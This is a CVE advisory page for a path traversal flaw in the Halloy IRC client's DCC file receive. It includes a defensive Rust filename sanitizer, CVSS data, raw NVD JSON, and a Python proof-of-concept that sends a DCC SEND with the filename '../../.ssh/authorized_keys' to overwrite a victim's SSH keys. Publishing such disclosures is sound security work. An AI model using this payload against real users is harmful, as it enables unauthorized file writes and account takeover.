Security Vulnerability Report
CVE-2026-32733 CVSS 6.5 MEDIUM

CVE-2026-32733

Published: 2026-03-20 23:16:45
Last Modified: 2026-03-23 19:21:37

Description

Halloy is an IRC application written in Rust. Prior to commit 0f77b2cfc5f822517a256ea5a4b94bad8bfe38b6, the DCC receive flow did not sanitize filenames from incoming `DCC SEND` requests. A remote IRC user could send a filename with path traversal sequences like `../../.ssh/authorized_keys` and the file would be written outside the user's configured `save_directory`. With auto-accept enabled this required zero interaction from the victim. Starting with commit 0f77b2cfc5f822517a256ea5a4b94bad8bfe38b6, all identified code paths sanitize filenames through a shared `sanitize_filename` function.
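A defensive sketch of the kind of check the description refers to, added here as an example. It is not Halloy's `sanitize_filename`; the function names `sanitize_dcc_filename` and `resolve_in_save_dir`, the sample inputs and the save directory path are all assumptions made for illustration.

```rust
use std::path::{Component, Path, PathBuf};

/// Reduce a peer-supplied DCC filename to a single safe path component.
/// Hypothetical helper for illustration; not Halloy's `sanitize_filename`.
pub fn sanitize_dcc_filename(raw: &str) -> Option<String> {
    // Keep only the text after the last separator. Both '/' and '\' count,
    // whatever the host OS, because the sender chooses the string.
    let last = raw.rsplit(|c: char| c == '/' || c == '\\').next().unwrap_or("");
    // Drop control characters and characters reserved on Windows.
    let cleaned: String = last
        .chars()
        .filter(|&c| !c.is_control() && !matches!(c, ':' | '*' | '?' | '"' | '<' | '>' | '|'))
        .collect();
    // Strip surrounding dots and whitespace: rejects "." and "..", and
    // avoids creating hidden dotfiles from remote input.
    let cleaned = cleaned.trim_matches(|c: char| c == '.' || c.is_whitespace());
    if cleaned.is_empty() { None } else { Some(cleaned.to_string()) }
}

/// Build the destination path and verify it is exactly one normal
/// component below `save_dir` (defence in depth on top of sanitising).
pub fn resolve_in_save_dir(save_dir: &Path, raw: &str) -> Option<PathBuf> {
    let name = sanitize_dcc_filename(raw)?;
    let candidate = save_dir.join(name);
    let contained = {
        let mut parts = candidate.strip_prefix(save_dir).ok()?.components();
        matches!((parts.next(), parts.next()), (Some(Component::Normal(_)), None))
    };
    if contained { Some(candidate) } else { None }
}

fn main() {
    // Constructed sample inputs; the save directory is an assumed path.
    let save_dir = Path::new("/home/user/Downloads");
    for raw in ["report.pdf", "../../.ssh/authorized_keys", "..\\..\\evil.txt", "..", ""] {
        match resolve_in_save_dir(save_dir, raw) {
            Some(p) => println!("{:?} -> {}", raw, p.display()),
            None => println!("{:?} -> rejected", raw),
        }
    }
}
```

The containment check runs on the joined path rather than on the raw string, so it still holds if the sanitising rules are later relaxed.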

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:halloy:halloy:*:*:*:*:*:*:*:* - VULNERABLE
Halloy < commit 0f77b2cfc5f822517a256ea5a4b94bad8bfe38b6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import socket

# This is a proof of concept to demonstrate the vulnerability.
# It sends a malicious DCC SEND request to a target IRC server/channel.
# The malicious filename contains path traversal sequences.

TARGET_IP = "127.0.0.1"
TARGET_PORT = 6667
NICKNAME = "attacker"
CHANNEL = "#test"
VICTIM_NICK = "victim"

# Malicious filename attempting to write to .ssh/authorized_keys
# Adjust the path traversal depth based on the victim's save_directory configuration
MALICIOUS_FILENAME = "../../.ssh/authorized_keys"
FAKE_IP = "2130706433"  # 127.0.0.1 as the 32-bit decimal integer DCC uses
FAKE_PORT = "4444"
FILE_SIZE = "100"


def send_exploit():
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((TARGET_IP, TARGET_PORT))

        # IRC Handshake
        sock.send(f"NICK {NICKNAME}\r\n".encode())
        sock.send(f"USER {NICKNAME} 0 * :{NICKNAME}\r\n".encode())
        sock.send(f"JOIN {CHANNEL}\r\n".encode())

        # Send malicious DCC SEND request
        # Format: PRIVMSG <target> :\x01DCC SEND <filename> <ip> <port> <size>\x01
        payload = f"PRIVMSG {VICTIM_NICK} :\x01DCC SEND {MALICIOUS_FILENAME} {FAKE_IP} {FAKE_PORT} {FILE_SIZE}\x01\r\n"
        sock.send(payload.encode())
        print(f"[+] Sent malicious DCC SEND request with filename: {MALICIOUS_FILENAME}")
    except Exception as e:
        print(f"[-] Error: {e}")
    finally:
        sock.close()


if __name__ == "__main__":
    send_exploit()
```

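References

https://github.com/squidowl/halloy/commit/0f77b2cfc5f822517a256ea5a4b94bad8bfe38b6 (Patch)
https://github.com/squidowl/halloy/security/advisories/GHSA-fqrv-rfg4-rv89 (Exploit, Vendor Advisory)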

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32733", "sourceIdentifier": "[email protected]", "published": "2026-03-20T23:16:44.703", "lastModified": "2026-03-23T19:21:36.567", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Halloy is an IRC application written in Rust. Prior to commit 0f77b2cfc5f822517a256ea5a4b94bad8bfe38b6, the DCC receive flow did not sanitize filenames from incoming `DCC SEND` requests. A remote IRC user could send a filename with path traversal sequences like `../../.ssh/authorized_keys` and the file would be written outside the user's configured `save_directory`. With auto-accept enabled this required zero interaction from the victim. Starting with commit 0f77b2cfc5f822517a256ea5a4b94bad8bfe38b6, all identified code paths sanitize filenames through a shared `sanitize_filename` function."}, {"lang": "es", "value": "Halloy es una aplicación de IRC escrita en Rust. Antes del commit 0f77b2cfc5f822517a256ea5a4b94bad8bfe38b6, el flujo de recepción DCC no saneaba los nombres de archivo de las solicitudes entrantes 'DCC SEND'. Un usuario remoto de IRC podría enviar un nombre de archivo con secuencias de salto de ruta como '../../.ssh/authorized_keys' y el archivo se escribiría fuera del 'save_directory' configurado por el usuario. Con la autoaceptación habilitada, esto no requería ninguna interacción de la víctima. 
A partir del commit 0f77b2cfc5f822517a256ea5a4b94bad8bfe38b6, todas las rutas de código identificadas sanean los nombres de archivo a través de una función compartida 'sanitize_filename'."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": 
"LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:halloy:halloy:*:*:*:*:*:*:*:*", "versionEndIncluding": "2026.4", "matchCriteriaId": "EAB64661-0590-4ABE-B7BC-1D17D0681AC3"}]}]}], "references": [{"url": "https://github.com/squidowl/halloy/commit/0f77b2cfc5f822517a256ea5a4b94bad8bfe38b6", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/squidowl/halloy/security/advisories/GHSA-fqrv-rfg4-rv89", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}